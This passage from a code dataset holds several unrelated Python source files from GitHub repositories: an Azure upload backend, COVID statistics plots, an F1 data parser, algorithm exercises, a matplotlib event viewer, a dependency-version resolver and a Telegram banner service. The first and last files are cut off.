execute_js('host.js')\n with open('host.json', 'r') as infile:\n host = json.load(infile)\n '''\n\n\n # Azure storage hosting\n azure_account = parameters['azureaccount']\n\n # Unique container name - requires non-collision * under a single Azure account *\n # 36^4=1679616 possibilities, Pr[collision] = 1 - ( (36^4-1)/36^4 )^num_datasets_created\n container_name = parameters['containername']\n\n # Generate machine-readable download link to hosted dataset\n azure_url = 'https://' + azure_account + '.blob.core.windows.net/' + container_name + '/output.json'\n\n try:\n # Create service used to call the Blob service for the storage account\n block_blob_service = BlockBlobService(account_name = azure_account, account_key = parameters['azurekey'])\n\n # Create container with name = asset_id\n block_blob_service.create_container(container_name)\n\n # Make public\n block_blob_service.set_container_acl(container_name, public_access = PublicAccess.Container)\n\n # Create and upload blob\n block_blob_service.create_blob_from_path(container_name, 'output.json', 'output.json')\n\n except Exception as e:\n print(e)\n\n\n # Outlier Ventures' abstraction for easy registration with Keeper and Aquarius\n reg.simple_register(parameters['name'],\n parameters['price'],\n parameters['description'],\n parameters['author'],\n azure_url)\n\n\n return ('', 200)\n\n\nif __name__ == '__main__':\n\n # Run web server\n app.run(host = HOST,\n debug = False, # Enable for auto-reload. Not for production.\n port = PORT)\n","repo_name":"OutlierVentures/H2O","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"9543730832","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\ndef growth_scatter(df):\n fig=go.Figure()\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Confirmed\"],\n mode='lines+markers',\n name='Confirmed Cases'))\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Recovered\"],\n mode='lines+markers',\n name='Recovered Cases'))\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Deaths\"],\n mode='lines+markers',\n name='Death Cases'))\n fig.update_layout(title=\"Growth of different types of cases\",\n xaxis_title=\"Date\",yaxis_title=\"Number of Cases\",legend=dict(x=0,y=1,traceorder=\"normal\"))\n\n st.write(fig)\n\ndef weekly_increase(df):\n week_num=[]\n weekwise_confirmed=[]\n weekwise_recovered=[]\n weekwise_deaths=[]\n w=1\n for i in list(df[\"WeekOfYear\"].unique()):\n weekwise_confirmed.append(df[df[\"WeekOfYear\"]==i][\"Confirmed\"].iloc[-1])\n weekwise_recovered.append(df[df[\"WeekOfYear\"]==i][\"Recovered\"].iloc[-1])\n weekwise_deaths.append(df[df[\"WeekOfYear\"]==i][\"Deaths\"].iloc[-1])\n week_num.append(w)\n w=w+1\n\n fig = plt.figure(figsize=(8,5))\n plt.plot(week_num,weekwise_confirmed,linewidth=3)\n plt.plot(week_num,weekwise_recovered,linewidth=3)\n plt.plot(week_num,weekwise_deaths,linewidth=3)\n plt.ylabel(\"Number of Cases\")\n plt.xlabel(\"Week Number\")\n plt.title(\"Weekly progress of Different Types of Cases\")\n # plt.xlabel\n st.pyplot(fig)\n\n fig, (ax1,ax2) = plt.subplots(1, 2,figsize=(15,5))\n sns.barplot(x=week_num,y=pd.Series(weekwise_confirmed).diff().fillna(0),ax=ax1)\n sns.barplot(x=week_num,y=pd.Series(weekwise_deaths).diff().fillna(0),ax=ax2)\n ax1.set_xlabel(\"Week Number\")\n ax2.set_xlabel(\"Week Number\")\n ax1.set_ylabel(\"Number of Confirmed Cases\")\n ax2.set_ylabel(\"Number of Death Cases\")\n ax1.set_title(\"Weekly increase in Number of Confirmed Cases\")\n ax2.set_title(\"Weekly increase in Number of Death Cases\")\n\n st.pyplot(fig)\n\ndef mortality(df):\n df[\"Mortality Rate\"]=(df[\"Deaths\"]/df[\"Confirmed\"])*100\n df[\"Recovery Rate\"]=(df[\"Recovered\"]/df[\"Confirmed\"])*100\n df[\"Active Cases\"]=df[\"Confirmed\"]-df[\"Recovered\"]-df[\"Deaths\"]\n df[\"Closed Cases\"]=df[\"Recovered\"]+df[\"Deaths\"]\n\n st.write(\"Average Mortality Rate = \",f'{df[\"Mortality Rate\"].mean():.2f}')\n st.write(\"Median Mortality Rate = \",f'{df[\"Mortality Rate\"].median():.2f}')\n st.write(\"Average Recovery Rate = \",f'{df[\"Recovery Rate\"].mean():.2f}')\n st.write(\"Median Recovery Rate = \",f'{df[\"Recovery Rate\"].median():.2f}')\n\n #Plotting Mortality and Recovery Rate \n fig = make_subplots(rows=2, cols=1,\n subplot_titles=(\"Recovery Rate\", \"Mortatlity Rate\"))\n fig.add_trace(\n go.Scatter(x=df.index, y=(df[\"Recovered\"]/df[\"Confirmed\"])*100,name=\"Recovery Rate\"),\n row=1, col=1\n )\n fig.add_trace(\n go.Scatter(x=df.index, y=(df[\"Deaths\"]/df[\"Confirmed\"])*100,name=\"Mortality Rate\"),\n row=2, col=1\n )\n fig.update_layout(height=1000,legend=dict(x=0,y=0.5,traceorder=\"normal\"))\n fig.update_xaxes(title_text=\"Date\", row=1, col=1)\n fig.update_yaxes(title_text=\"Recovery Rate\", row=1, col=1)\n fig.update_xaxes(title_text=\"Date\", row=1, col=2)\n fig.update_yaxes(title_text=\"Mortality Rate\", row=1, col=2)\n\n st.write(fig)\n\ndef growth_factor(df):\n daily_increase_confirm=[]\n daily_increase_recovered=[]\n daily_increase_deaths=[]\n for i in range(df.shape[0]-1):\n daily_increase_confirm.append(((df[\"Confirmed\"].iloc[i+1]/df[\"Confirmed\"].iloc[i])))\n daily_increase_recovered.append(((df[\"Recovered\"].iloc[i+1]/df[\"Recovered\"].iloc[i])))\n daily_increase_deaths.append(((df[\"Deaths\"].iloc[i+1]/df[\"Deaths\"].iloc[i])))\n daily_increase_confirm.insert(0,1)\n daily_increase_recovered.insert(0,1)\n daily_increase_deaths.insert(0,1)\n\n fig = plt.figure(figsize=(15,7))\n plt.plot(df.index,daily_increase_confirm,label=\"Growth Factor Confiremd Cases\",linewidth=3)\n plt.plot(df.index,daily_increase_recovered,label=\"Growth Factor Recovered Cases\",linewidth=3)\n plt.plot(df.index,daily_increase_deaths,label=\"Growth Factor Death Cases\",linewidth=3)\n plt.xlabel(\"Timestamp\")\n plt.ylabel(\"Growth Factor\")\n plt.title(\"Growth Factor of different Types of Cases\")\n plt.axhline(1,linestyle='--',color='black',label=\"Baseline\")\n plt.xticks(rotation=90)\n plt.legend()\n\n st.pyplot(fig)\n\ndef daily_increase(df):\n st.write(\"Average increase in number of Confirmed Cases every day: \",np.round(df[\"Confirmed\"].diff().fillna(0).mean()))\n st.write(\"Average increase in number of Recovered Cases every day: \",np.round(df[\"Recovered\"].diff().fillna(0).mean()))\n st.write(\"Average increase in number of Deaths Cases every day: \",np.round(df[\"Deaths\"].diff().fillna(0).mean()))\n\n fig=go.Figure()\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Confirmed\"].diff().fillna(0),mode='lines+markers',\n name='Confirmed Cases'))\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Recovered\"].diff().fillna(0),mode='lines+markers',\n name='Recovered Cases'))\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Deaths\"].diff().fillna(0),mode='lines+markers',\n name='Death Cases'))\n fig.update_layout(title=\"Daily increase in different types of Cases\",\n xaxis_title=\"Date\",yaxis_title=\"Number of Cases\",legend=dict(x=0,y=1,traceorder=\"normal\"))\n st.write(fig)\n\ndef double_days(df):\n c=1000\n double_days=[]\n C=[]\n while(1):\n double_days.append(df[df[\"Confirmed\"]<=c].iloc[[-1]][\"Days Since\"][0])\n C.append(c)\n c=c*2\n if(c<df[\"Confirmed\"].max()):\n continue\n else:\n break\n\n doubling_rate=pd.DataFrame(list(zip(C,double_days)),columns=[\"Cases\",\"Days since first Case\"])\n doubling_rate[\"Doubling Days\"]=doubling_rate[\"Days since first Case\"].diff().fillna(doubling_rate[\"Days since first Case\"])\n\n st.write(doubling_rate)\n","repo_name":"aws-samples/cloud-experiments","sub_path":"api/streamlit_experiments/covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":6268,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"37"} +{"seq_id":"36453740254","text":"#!/usr/bin/python3\n\n\"\"\"append function\"\"\"\n\n\ndef append_after(filename=\"\", search_string=\"\", new_string=\"\"):\n \"\"\"inserts a line after each line\"\"\"\n with open(filename, 'r+', encoding='utf-8') as f:\n y = f.readlines()\n f.seek(0)\n\n for x in y:\n f.write(x)\n if search_string in x:\n f.write(new_string)\n\n f.truncate()\n","repo_name":"mwanyambu/alx-higher_level_programming","sub_path":"0x0B-python-input_output/100-append_after.py","file_name":"100-append_after.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73373201388","text":"\"\"\"Helper functions for parsing and transforming raw F1 data.\n\nThis module provides a collection of utility functions to decode, \nnormalize, and prepare raw F1 data (either historical or real-time)\nbefore indexing into MongoDB. This includes JSON decoding, data type casting,\nkey modifications, array exploding, and more.\n\"\"\"\n\nfrom typing import List, Dict, Iterator, Optional, Union, Any\nimport json\nfrom functools import lru_cache\nfrom collections import defaultdict\nimport base64\nimport zlib\nfrom datetime import datetime\nfrom util import to_datetime\n\n\ndef _decode(raw: str) -> Dict:\n \"\"\"Decodes raw F1 data from either JSON or Base64 encoded compressed JSON\"\"\"\n try:\n return json.loads(raw.strip('\"'))\n except:\n s = zlib.decompress(base64.b64decode(raw), -zlib.MAX_WBITS)\n return json.loads(s.decode('utf-8-sig'))\n\n\ndef _is_number(s: Any) -> bool:\n \"\"\"Checks if the given argument can be converted to a float\"\"\"\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n@lru_cache(maxsize=None)\ndef _is_identifier(s: Any) -> bool:\n \"\"\"Checks if the given argument is an identifier (a team name, a driver number, ...)\"\"\"\n TEAM_NAMES = {\n 'Red Bull Racing Honda RBPT',\n 'Mercedes',\n 'Aston Martin Aramco Mercedes',\n 'Ferrari',\n 'Alpine Renault',\n 'McLaren Mercedes',\n 'Haas Ferrari',\n 'Alfa Romeo Ferrari',\n 'Williams Mercedes',\n 'AlphaTauri Honda RBPT',\n }\n return (\n _is_number(s)\n or s in TEAM_NAMES\n or (len(s) >= 2 and s[0] == 'p' and s[1].isupper())\n )\n\ndef _add_key(obj: Any, key: Any) -> Any:\n \"\"\"Utility function to store the key information from a flattened dict\"\"\"\n if isinstance(obj, dict):\n key_field = '_key'\n while key_field in set(obj.keys()):\n key_field = '_' + key_field\n obj[key_field] = key\n return obj\n elif isinstance(obj, list):\n return [_add_key(e, key=key) for e in obj]\n else:\n return {\n '_key': key,\n '_val': obj,\n }\n\ndef _remove_key_identifiers(obj: Any) -> Any:\n \"\"\"Transforms `obj` such that there are no more identifiers (team name, driver number, ...)\n as dictionary keys. Such fields would be impossible to query in the database otherwise.\n \"\"\"\n if isinstance(obj, dict):\n if any(_is_identifier(k) for k in obj):\n return [_add_key(_remove_key_identifiers(v), k) for k, v in obj.items()]\n else:\n return {k: _remove_key_identifiers(v) for k, v in obj.items()}\n elif isinstance(obj, list):\n return [_remove_key_identifiers(e) for e in obj]\n else:\n return obj\n\n\ndef _explode_arrays(collection_id: str, obj: Any,\n attributes: Optional[Dict] = None) -> Union[Any, List[Any]]:\n \"\"\"Transforms `obj` to remove arrays, because they could not be easily indexed\n and retrieved in the database.\n \"\"\"\n if attributes is None:\n attributes = {}\n else:\n attributes = {f'{k}_': v for k, v in attributes.items()}\n\n if isinstance(obj, list):\n res = []\n for i, e in enumerate(obj):\n attributes['idx'] = i\n _exploded = _explode_arrays(collection_id, e, attributes=attributes)\n if not isinstance(_exploded, list):\n _exploded = [_exploded]\n for j, _ in enumerate(_exploded):\n _exploded[j] = (_exploded[j][0], {'_val': _exploded[j][1]})\n for k, v in attributes.items():\n _exploded[j][1][f'_{k}'] = v\n res.extend(_exploded)\n return res\n\n elif isinstance(obj, dict):\n for k, v in obj.items():\n if not isinstance(v, list) and not isinstance(v, dict):\n attributes[k] = v\n\n exploded = []\n remaining = {}\n for k, v in obj.items():\n _exploded = _explode_arrays(f'{collection_id}-{k}', v, attributes=attributes)\n if isinstance(_exploded, list):\n exploded.extend(_exploded)\n else:\n remaining[k] = _exploded[1]\n \n if remaining and exploded:\n return [(collection_id, remaining)] + exploded\n elif not remaining and exploded:\n return exploded\n else:\n return (collection_id, remaining)\n\n else:\n return (collection_id, obj)\n\n\ndef _try_parse_date(s: str) -> Union[datetime, str]:\n \"\"\"Turns `s` into a datetime object if possible\"\"\"\n time = to_datetime(s)\n return time if time is not None else s\n\ndef _try_parse_number(s: str) -> Union[int, float, str]:\n \"\"\"Turns `s` into a number (int or float) if possible\"\"\"\n try:\n return int(s)\n except ValueError:\n try:\n return float(s)\n except ValueError:\n return s\n\ndef _try_parse_boolean(s: str):\n \"\"\"Turns `s` into a boolean if possible\"\"\"\n if s.lower() == 'true':\n return True\n elif s.lower() == 'false':\n return False\n else:\n return s\n\n@lru_cache(maxsize=None)\ndef _cast(s: str) -> Union[str, datetime, bool, int, float]:\n \"\"\"Casts `s` to the most specific type possible (str, datetime, bool, int or float)\"\"\"\n s = _try_parse_date(s)\n if isinstance(s, datetime):\n return s\n s = _try_parse_boolean(s)\n if isinstance(s, bool):\n return s\n return _try_parse_number(s)\n\ndef cast(obj: Any) -> Any:\n \"\"\"Casts `obj` to the most specific type possible, recursively\"\"\"\n if isinstance(obj, str):\n return _cast(obj)\n elif isinstance(obj, dict):\n return {k: cast(v) for k, v in obj.items()}\n elif isinstance(obj, list):\n return [cast(e) for e in obj]\n else:\n return obj\n\n\ndef _flatten_list(obj: Any) -> Iterator[Any]:\n if isinstance(obj, list):\n for e in obj:\n yield from _flatten_list(e)\n else:\n yield obj\n\n\ndef _apply_custom_transformations(topic: str, data: Dict) -> None:\n \"\"\"Transforms some raw data for storage optimization\"\"\"\n if topic == 'CarData.z': # This topic has a very large memory footprint in the database\n for elem in data:\n for entry in elem['Entries']:\n new_cars = []\n for old_car in entry['Cars']:\n new_car = {k: v for k, v in old_car.items() if k != 'Channels'}\n for channel in old_car['Channels']:\n new_car[f'ch_{channel[\"_key\"]}'] = channel['_val']\n new_cars.append(new_car)\n \n entry['Cars'] = new_cars\n\n\ndef parse_line(topic: str, content: str, session_key: str, meeting_key: str, time: datetime,\n session_time: Optional[float] = None) -> Dict[str, Dict]:\n \"\"\"Parses a single raw line of F1 data.\n\n This function decodes and transforms a raw F1 data line into a more\n structured and usable format for indexing into MongoDB.\n \"\"\"\n decoded = _decode(content) if isinstance(content, str) else content\n flattened = list(_flatten_list(_remove_key_identifiers(decoded)))\n\n _apply_custom_transformations(topic=topic, data=flattened)\n\n parsed = defaultdict(list)\n for content in flattened:\n # Explode\n exploded = _explode_arrays(topic, content)\n if not isinstance(exploded, list):\n exploded = [exploded]\n\n for collection_id, data in exploded:\n if not data:\n continue\n data = cast(data)\n\n # Add metadata\n data['_time'] = time\n data['_session_key'] = session_key\n data['_meeting_key'] = meeting_key\n if session_time:\n data['_session_time'] = session_time\n\n parsed[collection_id].append(data)\n\n return dict(parsed)\n","repo_name":"br-g/openf1","sub_path":"ingestor/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"7937593701","text":"# 1\nuser_age, max_heartrate = 0, 0\nprint_list = [0 for _ in range(6)] # 최고, 고, 중, 집중, 워밍, 휴식\n\nwhile True:\n if user_age:\n\n try:\n cur = float(input())\n except EOFError:\n break\n\n if max_heartrate * 90 / 100 <= cur:\n print_list[0] += 1\n elif max_heartrate * 80 / 100 <= cur:\n print_list[1] += 1\n elif max_heartrate * 75 / 100 <= cur:\n print_list[2] += 1\n elif max_heartrate * 68 / 100 <= cur:\n print_list[3] += 1\n elif max_heartrate * 60 / 100 <= cur:\n print_list[4] += 1\n else:\n print_list[5] += 1\n\n else: # 없으면\n user_age = int(input())\n max_heartrate = 220 - user_age\n\nfor e in print_list:\n print(e, end=' ')\n\n\n# 2\nimport sys\nsys.stdin = open('input.txt', 'r')\n\nN = int(input())\nL = [list(map(int, input().split())) for _ in range(N)]\nCL = [[0 for _ in range(N)] for _ in range(N)]\n\ndir = [(-1, 0), (0, 1), (1, 0), (0, -1)] # 상우하좌\nL[0][0] = 2 # 물\nL[N-1][N-1] = 7 # 홍현\n\ntime, res = 0, 0\nwater = [(0, 0)]\ncur_p_loca = [(N - 1, N - 1)]\n\n\ndef splash(L, water):\n cnt = 0\n cur_water = []\n for x in water:\n cur_water.append(x)\n\n while cur_water:\n i, j = cur_water.pop(0)\n for ii, jj in dir:\n ii = ii + i\n jj = jj + j\n if 0 <= ii < N and 0 <= jj < N:\n if L[ii][jj] == 0 or L[ii][jj] == 7:\n L[ii][jj] = 2\n cur_water.append((ii, jj))\n\n for y in range(N):\n for x in range(N):\n if L[y][x] == 0 or L[y][x] == 7:\n cnt += 1\n return cnt\n\n\nwhile cur_p_loca:\n new_water = []\n while water:\n a, b = water.pop(0)\n for aa, bb in dir:\n aa = aa+a\n bb = bb+b\n if 0 <= aa < N and 0 <= bb < N:\n if L[aa][bb] == 0 or L[aa][bb] == 7:\n L[aa][bb] = 2\n new_water.append((aa, bb))\n water = new_water\n\n i, j = cur_p_loca.pop(0)\n for ii, jj in dir:\n ii = ii+i\n jj = jj+j\n if 0 <= ii < N and 0 <= jj < N:\n if L[ii][jj] == 0:\n L[ii][jj] = 3\n\n for y in range(N):\n for x in range(N):\n CL[y][x] = L[y][x]\n\n cnt = splash(CL, water)\n if cnt > res:\n res = cnt\n\n L[ii][jj] = 7\n cur_p_loca.append((ii, jj))\n\n elif L[ii][jj] == 1:\n L[ii][jj] = 8\n cur_p_loca.append((ii, jj))\nprint(res)","repo_name":"anyl92/ALGORITHM","sub_path":"test/200829_brandi.py","file_name":"200829_brandi.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25661567854","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.widgets as WID\nimport matplotlib.colors\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport sys\n#plt.style.use('presentation')\n\n\nFileName=sys.argv[-1]\nif FileName=='EventPlotter.py':\n print(\"Tell me a file to use!\")\n exit()\nm=np.load(FileName)\npe_MAX=0\nfor i in range(len(m)):\n for j in range(len(m[i])):\n for k in range(len(m[i][j])):\n if pe_MAX <= m[i][j][k]:\n pe_MAX=m[i][j][k]\n if m[i][j][k]==0:\n m[i][j][k]=np.nan\ngtu=0\n#sets up canvas \nfig =plt.figure()\nfig.set_figheight(9)\nfig.set_figwidth(16)\nax = fig.add_axes([0.05,0.05,0.9,0.9])\n\n\n \ndelta_gtu = 1\nmax_GTU=len(m)\naxcolor = 'lightgoldenrodyellow'\naxslidder = plt.axes([0.15, 0.05, 0.55, 0.03], facecolor=axcolor)\naxbuttona = plt.axes([0.75, 0.05, 0.05, 0.03], facecolor=axcolor)\naxbuttonb = plt.axes([0.05,0.05,0.05,0.03],facecolor=axcolor)\naxtxt = plt.axes([0.85,0.05,0.05,0.03],facecolor=axcolor)\nslider = WID.Slider(axslidder, '', 1, max_GTU, valinit=gtu, valstep=delta_gtu,valfmt= \"%1d\")\nbuttona = WID.Button(axbuttona,'Next')\nbuttonb = WID.Button(axbuttonb,'Prev')\ntext_box= WID.TextBox(axtxt,'',initial=str(gtu))\nnorm=plt.Normalize(1,pe_MAX/2.0)\ndivider = make_axes_locatable(ax)\ncax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n\nim=ax.imshow(m[0], norm=norm,origin='lower',cmap='YlOrBr')\nax.set_xlabel('X Pixel')\nax.set_ylabel('Y Pixel')\nax.set_title('GTU '+str(gtu))\nfig.colorbar(im,orientation='vertical',cax=cax,label='PE/pix')\n\ndef s_update(val):\n global gtu\n gtu=int(slider.val)\n ax.clear()\n ax.imshow(m[gtu-1], norm=norm,origin='lower',cmap='YlOrBr')\n ax.set_xlabel('X Pixel')\n ax.set_ylabel('Y Pixel')\n ax.set_title('GTU '+str(gtu))\n plt.draw() \n\ndef b_updatea(self):\n global gtu\n if gtu <max_GTU:\n gtu+=1\n slider.set_val(gtu)\n ax.clear()\n ax.imshow(m[gtu-1], norm=norm,origin='lower',cmap='YlOrBr')\n ax.set_xlabel('X Pixel')\n ax.set_ylabel('Y Pixel')\n ax.set_title('GTU '+str(gtu))\n plt.draw()\n \ndef b_updateb(self):\n global gtu\n if gtu>0:\n gtu-=1 \n slider.set_val(gtu)\n ax.clear()\n ax.imshow(m[gtu-1], norm=norm,origin='lower',cmap='YlOrBr')\n ax.set_xlabel('X Pixel')\n ax.set_ylabel('Y Pixel')\n ax.set_title('GTU '+str(gtu))\n plt.draw()\n\ndef text_update(text):\n global gtu\n gtu = int(text)\n slider.set_val(gtu)\n ax.clear()\n ax.imshow(m[gtu-1], norm=norm,origin='lower',cmap='YlOrBr')\n ax.set_xlabel('X Pixel')\n ax.set_ylabel('Y Pixel')\n ax.set_title('GTU '+str(gtu))\n plt.draw()\n\nslider.on_changed(s_update)\nbuttona.on_clicked(b_updatea)\nbuttonb.on_clicked(b_updateb)\ntext_box.on_submit(text_update)\nplt.show()\n \n","repo_name":"AstroGroupCSM/SPB2Reconstruction","sub_path":"WeidBehaviorInspector/EventPlotter.py","file_name":"EventPlotter.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38996131888","text":"from collections import defaultdict, deque\nfrom dataclasses import dataclass, field\nfrom typing import Callable, Iterable, List, MutableMapping, MutableSet, Optional\n\nfrom typing_extensions import Protocol\n\nfrom . import brick\n\n\nclass Reqs(Protocol):\n \"\"\"The requirement graph on which Minimal Version Selection (MVS)\n operates.\n\n The version strings are opaque except for the special version\n `\"none\"` (see the documentation for `brick.Brick`). In particular,\n MVS does not assume that the version strings are semantic versions;\n instead, the `max` method gives access to the comparison operation.\n\n \"\"\"\n\n # pylint: disable=no-self-use,unused-argument\n\n def required(self, brk: brick.Brick) -> Iterable[brick.Brick]:\n \"\"\"Return the brick versions explicitly required by `brk`.\"\"\"\n ... # pragma: no cover\n\n def max(self, ver1: str, ver2: str) -> str:\n \"\"\"Returns the maximum of `ver1` and `ver2` (return either\n `ver1` or `ver2`).\n\n For all versions `ver`, `max(ver, \"none\")` must be `ver`, and\n for the `target` passed as the first argument to MVS functions,\n `max(target, ver)` must be `target`.\n\n \"\"\"\n ... # pragma: no cover\n\n def upgrade(self, brk: brick.Brick) -> brick.Brick:\n \"\"\"Returns the upgraded version of `brk`, for use during an\n `upgrade_all` operation.\n\n If `brk` should be kept as is, returns `brk`.\n More typically, `brk.version` will be the version required by\n some other module in the build.\n\n \"\"\"\n ... # pragma: no cover\n\n def previous(self, brk: brick.Brick) -> brick.Brick:\n \"\"\"Returns the version of `brk.name` immediately prior to\n `brk.version`, or `\"none\"` if no such version is known.\n\n\n \"\"\"\n ... # pragma: no cover\n\n\ndef build_list(\n target: brick.Brick,\n reqs: Reqs,\n upgrader: Optional[Callable[[brick.Brick], brick.Brick]] = None,\n) -> Iterable[brick.Brick]:\n \"\"\"Return the build list for the target brick.\n\n The first element is the target itself, with the remainder of the\n list sorted by name.\n\n \"\"\"\n\n @dataclass(unsafe_hash=True)\n class Node:\n brk: brick.Brick = field(hash=True)\n required: Iterable[brick.Brick] = field(default_factory=list, hash=False)\n\n graph: MutableMapping[brick.Brick, Node] = {}\n mins: MutableMapping[str, str] = {} # map brick name to minimum required version\n todo, done = deque([target]), set()\n while todo:\n # pylint: disable=broad-except\n curr = todo.popleft()\n done.add(curr)\n node = Node(curr)\n graph[curr] = node\n if (\n curr.name not in mins\n or reqs.max(mins[curr.name], curr.version) != mins[curr.name]\n ):\n mins[curr.name] = curr.version\n node.required = reqs.required(curr)\n todo.extend(r for r in node.required if r not in done)\n if upgrader:\n upg = upgrader(curr)\n if upg not in done:\n todo.append(upg)\n\n # Construct the list by traversing the graph again, replacing older\n # bricks with required minimum versions.\n todo, res = deque([target]), [target]\n processed = {target.name}\n while todo:\n curr = todo.popleft()\n for req_ in graph[curr].required:\n ver = mins[req_.name]\n if req_.name != target.name:\n assert reqs.max(ver, req_.version) == ver\n if req_.name not in processed:\n res.append(brick.Brick(req_.name, ver))\n todo.append(res[-1])\n processed.add(req_.name)\n return [res[0]] + sorted(res[1:], key=lambda b: b.name)\n\n\ndef req(\n target: brick.Brick, blist: Iterable[brick.Brick], base: Iterable[str], reqs: Reqs\n) -> Iterable[brick.Brick]:\n \"\"\"Return the minimal requirement list for the target brick that\n results in the given build list, with the constraint that all brick\n names listed in base must appear in the returned list.\n\n \"\"\"\n # Compute postorder, cache requirements.\n postorder: List[brick.Brick] = []\n cache: MutableMapping[brick.Brick, Iterable[brick.Brick]] = {target: []}\n\n def walk(brk: brick.Brick):\n if brk in cache:\n return\n required = reqs.required(brk)\n cache[brk] = required\n for req_ in required:\n walk(req_)\n postorder.append(brk)\n\n for brk in blist:\n walk(brk)\n\n # Walk bricks in reverse post-order, only adding those not implied\n # already.\n have: MutableMapping[str, str] = {}\n\n def reverse_walk(brk: brick.Brick):\n if brk.name in have and reqs.max(brk.version, have[brk.name]) == have[brk.name]:\n return\n have[brk.name] = brk.version\n for req_ in cache.get(brk, []):\n reverse_walk(req_)\n\n # Sanitize the given build list searching for duplicates.\n maxs: MutableMapping[str, str] = {}\n for brk in blist:\n if brk.name in maxs:\n maxs[brk.name] = reqs.max(brk.version, maxs[brk.name])\n else:\n maxs[brk.name] = brk.version\n\n # First walk the base bricks that must be listed.\n mins: List[brick.Brick] = []\n for name in base:\n brk = brick.Brick(name, maxs.get(name, \"\"))\n mins.append(brk)\n reverse_walk(brk)\n # Now the reverse postorder to bring in anything else.\n for brk in postorder[::-1]:\n if maxs.get(brk.name, \"\") != brk.version:\n # older version\n continue\n if have.get(brk.name, \"\") != brk.version:\n mins.append(brk)\n reverse_walk(brk)\n return sorted(mins, key=lambda b: b.name)\n\n\ndef upgrade_all(target: brick.Brick, reqs: Reqs) -> Iterable[brick.Brick]:\n \"\"\"Return a build list for the target brick in which every brick is\n upgraded to its latest version.\n\n \"\"\"\n\n def _upgrade(brk: brick.Brick) -> brick.Brick:\n return target if brk.name == target.name else reqs.upgrade(brk)\n\n return build_list(target, reqs, _upgrade)\n\n\nclass _OverrideReqs:\n def __init__(\n self, target: brick.Brick, required: Iterable[brick.Brick], reqs: Reqs\n ):\n self._target = target\n self._required = required\n self._reqs = reqs\n\n def __getattr__(self, name):\n return getattr(self._reqs, name)\n\n def required(self, brk: brick.Brick) -> Iterable[brick.Brick]:\n return self._required if brk == self._target else self._reqs.required(brk)\n\n\ndef upgrade(\n target: brick.Brick, reqs: Reqs, *args: brick.Brick\n) -> Iterable[brick.Brick]:\n \"\"\"Return a build list for the target brick in which the given\n additional bricks are upgraded.\n\n \"\"\"\n required = list(reqs.required(target)) + list(args)\n return build_list(target, _OverrideReqs(target, required, reqs))\n\n\ndef downgrade(\n target: brick.Brick, reqs: Reqs, *args: brick.Brick\n) -> Iterable[brick.Brick]:\n \"\"\"Return a build list for the target brick in which the given\n additional bricks are downgraded.\n\n \"\"\"\n required = reqs.required(target)\n maxs: MutableMapping[str, str] = {r.name: r.version for r in required}\n for arg in args:\n if arg.name not in maxs or reqs.max(maxs[arg.name], arg.version) != arg.version:\n maxs[arg.name] = arg.version\n added: MutableSet[brick.Brick] = set()\n rdeps: MutableMapping[brick.Brick, List[brick.Brick]] = defaultdict(list)\n excluded: MutableSet[brick.Brick] = set()\n\n def exclude(brk: brick.Brick):\n if brk in excluded:\n return\n excluded.add(brk)\n for dep in rdeps.get(brk, []):\n exclude(dep)\n\n def add(brk: brick.Brick):\n if brk in added:\n return\n added.add(brk)\n if brk.name in maxs and reqs.max(brk.version, maxs[brk.name]) != maxs[brk.name]:\n exclude(brk)\n return\n for req_ in reqs.required(brk):\n add(req_)\n if req_ in excluded:\n exclude(brk)\n return\n rdeps[req_].append(brk)\n\n out: List[brick.Brick] = [target]\n for curr in required:\n add(curr)\n while curr in excluded:\n prev = reqs.previous(curr)\n ver = maxs.get(curr.name, \"\")\n if (\n reqs.max(ver, curr.version) != ver\n and reqs.max(prev.version, ver) != prev.version\n ):\n prev = brick.Brick(prev.name, ver)\n if prev.version == \"none\":\n break\n add(prev)\n curr = prev\n else:\n out.append(curr)\n return out\n","repo_name":"websebdev/cli","sub_path":"src/iccli/cmd/mvs.py","file_name":"mvs.py","file_ext":"py","file_size_in_byte":8618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19589401265","text":"from functools import cached_property\n\nfrom banners.models import Banner, QueueItemSource, BannerTelegram\nfrom shared.services.result import Success, Failure\nfrom telebot import types\n\n\nclass CalcPeopleAhead:\n def __init__(self, message, bot):\n self.message = message\n self.bot = bot\n\n def call(self):\n if not self.banner_telegram:\n return self.error_msg_and_failure(\n f\"unknown banner for the chat id: {self.message.chat.id}\"\n )\n\n if not self.banner:\n return self.error_msg_and_failure(\n 'banner not found'\n )\n\n if not self.queue_item:\n return self.error_msg_and_failure(\n 'queue item not found'\n )\n\n self.send_message_to_bot()\n\n return Success(self.queue_item)\n\n @cached_property\n def banner_telegram(self):\n return BannerTelegram.objects.filter(chat_id=self.message.chat.id).first()\n\n @cached_property\n def banner(self):\n return Banner.objects.filter(pk=self.banner_telegram.banner_id).first()\n\n @cached_property\n def queue_item(self):\n return 